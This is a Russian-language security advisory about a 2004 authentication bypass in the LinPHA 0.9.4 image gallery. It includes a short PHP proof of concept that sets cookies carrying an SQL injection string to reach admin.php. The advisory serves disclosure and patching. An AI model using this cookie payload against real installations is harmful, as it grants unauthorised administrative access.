Удаленный административный доступ в LinPHA галереи изображений
| Дата публикации: | 01.08.2004 |
| Всего просмотров: | 1104 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Раскрытие важных данных Раскрытие системных данных Обход ограничений безопасности |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | LinPHA 0.x |
| Уязвимые версии: LinPHA 0.9.4
Описание: Уязвимость в LinPHA галереи изображений позволяет удаленному пользователю получить административный доступ к приложению. Удаленный пользователь может установить специально обработанные значения куки и затем обратится к 'admin.php' сценарию, чтобы успешно аутентифицироваться в приложении. Пример:
<?PHP
setcookie("linpha_userid","1",time()+86400*365,'/linpha');
setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha');
?>
URL производителя:http://linpha.sourceforge.net/ Решение:Установите обновление, доступное через CVS. |
|
| Ссылки: | Linpha 0.9.4: authentication bypass |